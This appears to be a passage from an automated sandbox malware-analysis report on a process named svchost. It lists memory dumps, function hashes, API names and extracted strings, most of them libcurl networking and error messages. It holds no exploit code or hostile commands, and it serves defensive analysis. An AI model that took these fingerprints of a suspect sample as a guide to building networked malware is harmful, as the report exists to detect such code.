                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$malloc$callocmemmove
                                                                                                                                                                                • String ID: :%u$Shuffling %i addresses
                                                                                                                                                                                • API String ID: 3189054979-338667637
                                                                                                                                                                                • Opcode ID: 192cc96975d25f6858167928624b0a8a5cf2d7fd424c6fa2df1eeca0bacbc3a3
                                                                                                                                                                                • Instruction ID: 204270aea3231bce7fefe607271a1d90adb8bdce785889a40d8f43730ef55e2e
                                                                                                                                                                                • Opcode Fuzzy Hash: 192cc96975d25f6858167928624b0a8a5cf2d7fd424c6fa2df1eeca0bacbc3a3
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A718072609B8682EA608B09E4143BAB7A0FB8CBD8F484535DF4E47796DF3DE446C744
                                                                                                                                                                                Strings
                                                                                                                                                                                • Error while processing content unencoding: %s, xrefs: 00007FF8B836E360
                                                                                                                                                                                • Error while processing content unencoding: Unknown failure within decompression software., xrefs: 00007FF8B836E43C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freeinflate
                                                                                                                                                                                • String ID: Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                                                                                                                                                                                • API String ID: 3681154942-1163695657
                                                                                                                                                                                • Opcode ID: 2c4f63e57f6524ab5192e6bc0b5d86fc1aceb97fde192ba6da88769d6ad3e60c
                                                                                                                                                                                • Instruction ID: 09f29dc85788f2d4b96753cecaa7f14213e513d32cb456fe58e783156a5ad5bc
                                                                                                                                                                                • Opcode Fuzzy Hash: 2c4f63e57f6524ab5192e6bc0b5d86fc1aceb97fde192ba6da88769d6ad3e60c
                                                                                                                                                                                • Instruction Fuzzy Hash: 8A614872A0C61297EA659B2D9544129A7A0FF4CBD0F284236DB4D43F94DF3CF47A8748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdupfreestrchrstrncmpstrtol
                                                                                                                                                                                • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                                                                                                                                                                • API String ID: 2995991915-4202423297
                                                                                                                                                                                • Opcode ID: 7fbd0f8112a7c11e1a60b2e3888cebaf80f383857ef4f85b148a6c74652c0076
                                                                                                                                                                                • Instruction ID: 49cfe24afd48a7c65b7d6c31ec9630656eec6978861212b028de307d51c2c60b
                                                                                                                                                                                • Opcode Fuzzy Hash: 7fbd0f8112a7c11e1a60b2e3888cebaf80f383857ef4f85b148a6c74652c0076
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F51B1A2A0CA868AFB228B19A4103756791EF4DBD4F4C4036DB5C06285DF6CE887C719
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                                                                                                                                                                                • API String ID: 909987262-435359029
                                                                                                                                                                                • Opcode ID: ce3aedaa79c5094670a231a003073b05acd142144885e4365ab663f246a7827d
                                                                                                                                                                                • Instruction ID: d6feac8ef5fffcb0eb4cc36747dbb937400dc41e40d613958512c62d94f56a8e
                                                                                                                                                                                • Opcode Fuzzy Hash: ce3aedaa79c5094670a231a003073b05acd142144885e4365ab663f246a7827d
                                                                                                                                                                                • Instruction Fuzzy Hash: 2C41D122A0A586A6E624CF38D0502BD63A0FF517C4F945132D75E427E5FF2CE6A6E740
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: Failed to resolve "%s" for SOCKS4 connect.$SOCKS4 communication to %s:%d$SOCKS4 connect request$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 non-blocking resolve of %s$SOCKS4 reply has wrong version, version should be 0.$SOCKS4: too long hostname$Too long SOCKS proxy username$connect request ack
                                                                                                                                                                                • API String ID: 0-1541643041
                                                                                                                                                                                • Opcode ID: 404fcce85ddcc1f695383d4be677809e50bf0570afe1478817b63384ed92ee7e
                                                                                                                                                                                • Instruction ID: be22b8dc6064dfc2f3f1e8b33f90a5b9ab465f28a33720140c58fd110ca11a80
                                                                                                                                                                                • Opcode Fuzzy Hash: 404fcce85ddcc1f695383d4be677809e50bf0570afe1478817b63384ed92ee7e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1991A162A0C68289EB618F29D8503BD77A0EB19BC8F4C8132DB5D07696DF7CE447C749
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdup
                                                                                                                                                                                • String ID: application/octet-stream$k
                                                                                                                                                                                • API String ID: 1169197092-2522224428
                                                                                                                                                                                • Opcode ID: 3229da12c0dda1e45bb9a94f3e4cfdcef69331be603ef9a5fe8c2543a2b8fca3
                                                                                                                                                                                • Instruction ID: 99d67175662051262dd1bb31ffe95fffa3a5c5ec25f9178c5e27f51d16d3cec5
                                                                                                                                                                                • Opcode Fuzzy Hash: 3229da12c0dda1e45bb9a94f3e4cfdcef69331be603ef9a5fe8c2543a2b8fca3
                                                                                                                                                                                • Instruction Fuzzy Hash: C8A12C7AA0AB4686EB658F2994507292BE5FB48BDCF1C0235CF5D46794DF3CD892C308
                                                                                                                                                                                APIs
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,00007FF8B836441A), ref: 00007FF8B8388F56
                                                                                                                                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00007FF8B836441A), ref: 00007FF8B8388F63
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdupfree
                                                                                                                                                                                • String ID: Authentication problem. Ignoring this.$Basic$Bearer$Digest$Ignoring duplicate digest auth header.$NTLM$Negotiate
                                                                                                                                                                                • API String ID: 1865132094-2770282708
                                                                                                                                                                                • Opcode ID: 44106a337f4e4a7080dd3f8fa0abee6a5029f30a01bf1735e8347b7382d512d2
                                                                                                                                                                                • Instruction ID: 28ef4d324b8b5063001782c16c5bbc43493b1ddefb7a94e0e1a9886839df19ad
                                                                                                                                                                                • Opcode Fuzzy Hash: 44106a337f4e4a7080dd3f8fa0abee6a5029f30a01bf1735e8347b7382d512d2
                                                                                                                                                                                • Instruction Fuzzy Hash: C481D561A0C2D286FB249A2E99643BA7B91AF0D7C4F4C4430DF8E066C7DF2DE5478719
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269904088.00007FF8A8127000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269923778.00007FF8A812A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269942728.00007FF8A812B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3269962722.00007FF8A812F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8a7f00000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Replicator::operator[]
                                                                                                                                                                                • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                • API String ID: 3676697650-3207858774
                                                                                                                                                                                • Opcode ID: f8deaa5a6abd9b46b2b91e3122156e3b4bd3ad43867c9f69d3feb0f388d10355
                                                                                                                                                                                • Instruction ID: 651dbff3e92064d22ee9cee97f03259743107c81a3af63fb44478185c3a1ce5b
                                                                                                                                                                                • Opcode Fuzzy Hash: f8deaa5a6abd9b46b2b91e3122156e3b4bd3ad43867c9f69d3feb0f388d10355
                                                                                                                                                                                • Instruction Fuzzy Hash: BF81BC32B1AA8AA9FB219F34D8602BC37A0EB457C8F544532DA4D03795EF3CE605E350
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • # Your alt-svc cache. https://curl.se/docs/alt-svc.html# This file was generated by libcurl! Edit at your own risk., xrefs: 00007FF8B8361A1D
                                                                                                                                                                                • %s %s%s%s %u %s %s%s%s %u "%d%02d%02d %02d:%02d:%02d" %u %u, xrefs: 00007FF8B8361BB8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: fcloseinet_pton$_unlinkfputsfree
                                                                                                                                                                                • String ID: # Your alt-svc cache. https://curl.se/docs/alt-svc.html# This file was generated by libcurl! Edit at your own risk.$%s %s%s%s %u %s %s%s%s %u "%d%02d%02d %02d:%02d:%02d" %u %u
                                                                                                                                                                                • API String ID: 3294334013-182757231
                                                                                                                                                                                • Opcode ID: 482cf12b7b3e5386b6151877fde028e6324357005c4734d91506326604ffaf11
                                                                                                                                                                                • Instruction ID: 609916fe20e7f6a4e2c801199d3fb08bbde83e9264776cbe1729ae4f5b0621cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 482cf12b7b3e5386b6151877fde028e6324357005c4734d91506326604ffaf11
                                                                                                                                                                                • Instruction Fuzzy Hash: E3811C71A0D7C686EA648B19E4503AEB3A4FB897C0F484435DB8D83B54DF3CE496CB08
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                • String ID: ???$FTP response aborted due to select/poll error: %d$FTP response timeout$STOP$We got a 421 - timeout$[%s] -> [%s]$getFTPResponse -> result=%d, nread=%zd, ftpcode=%d$getFTPResponse start
                                                                                                                                                                                • API String ID: 1452528299-2707140833
                                                                                                                                                                                • Opcode ID: 3fd23011565778629a998ed210ebc8f314ea0aa4d82ef33db6392fe1295b35c5
                                                                                                                                                                                • Instruction ID: f3d77419da7190aff0b9abf0cfcf49581706d1df364fda1bb697a3f86a8786ff
                                                                                                                                                                                • Opcode Fuzzy Hash: 3fd23011565778629a998ed210ebc8f314ea0aa4d82ef33db6392fe1295b35c5
                                                                                                                                                                                • Instruction Fuzzy Hash: 12616C26A0878681EA619F2EA8407BA6B90AF8D7D8F4C4131DF5E47391DF3CE4478708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_close_fdopen_fileno_fstat64_unlink_wfopenfclose
                                                                                                                                                                                • String ID: %s%s.tmp
                                                                                                                                                                                • API String ID: 3347258806-1935936288
                                                                                                                                                                                • Opcode ID: 2360f05c615ef0394ea5f5a97206e8c1e7380c6024c630b38b3e978835b47c1e
                                                                                                                                                                                • Instruction ID: 2b3db7409144a02b3ace0072cf007a96bee4117a1dcb0be2e5cc0165481e4090
                                                                                                                                                                                • Opcode Fuzzy Hash: 2360f05c615ef0394ea5f5a97206e8c1e7380c6024c630b38b3e978835b47c1e
                                                                                                                                                                                • Instruction Fuzzy Hash: 9451B325B0DB4282FE509B29A450BBA2690AF4DBD9F8C4131DF5D467D1EF2DE847C708
                                                                                                                                                                                APIs
                                                                                                                                                                                • SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF8B8389BB7
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B83B9E27
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9E41
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9E5C
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9E78
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9E94
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9EB0
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9EC8
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9EE0
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9EF8
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9F10
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8B83B9F28
                                                                                                                                                                                  • Part of subcall function 00007FF8B83B9E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B83B9F42
                                                                                                                                                                                • SimpleString::operator=.MSOBJ140-MSVCRT ref: 00007FF8B8389AFA
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8389B06
                                                                                                                                                                                • strstr.VCRUNTIME140 ref: 00007FF8B8389B45
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdup$SimpleString::operator=free$callocstrstr
                                                                                                                                                                                • String ID: ;type=$;type=%c$?%s$ftp$http
                                                                                                                                                                                • API String ID: 147471493-3547414
                                                                                                                                                                                • Opcode ID: 13284ef4d280c7f0b0147fa29fe3567ecd1f1e651030fc0ef6d7bd08327defad
                                                                                                                                                                                • Instruction ID: d0d8bd3aac11198614be598db94e96cbee5259bad66a7e66c4b9675968c51a25
                                                                                                                                                                                • Opcode Fuzzy Hash: 13284ef4d280c7f0b0147fa29fe3567ecd1f1e651030fc0ef6d7bd08327defad
                                                                                                                                                                                • Instruction Fuzzy Hash: A651D421B0E78349FB559A6AA8617BA6690AF8DBC4F0C4431DF4D47786EF2CE4438348
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: SimpleString::operator=_vfwprintf_lfree
                                                                                                                                                                                • String ID: %s: %s$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$GMT$Signature
                                                                                                                                                                                • API String ID: 3487055449-2552702830
                                                                                                                                                                                • Opcode ID: fc146fc076125263568dac0f4f6c9b1a7111c1325e11581604731b6851ad75cf
                                                                                                                                                                                • Instruction ID: 9167b412acde9bfa91bb9d37d07dcd9a74fe15db51b47d48c0c7be1387ec2645
                                                                                                                                                                                • Opcode Fuzzy Hash: fc146fc076125263568dac0f4f6c9b1a7111c1325e11581604731b6851ad75cf
                                                                                                                                                                                • Instruction Fuzzy Hash: B2517B66B08B83C1EB209B6DE4446BA77A1AB4C7C8F484032DF4D47659DF7CE54ACB08
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3269749191.00007FF8A7F01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A7F00000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3269730973.00007FF8A7F00000.00000002.00000001.01000000.0000000B.sdmpDownload File
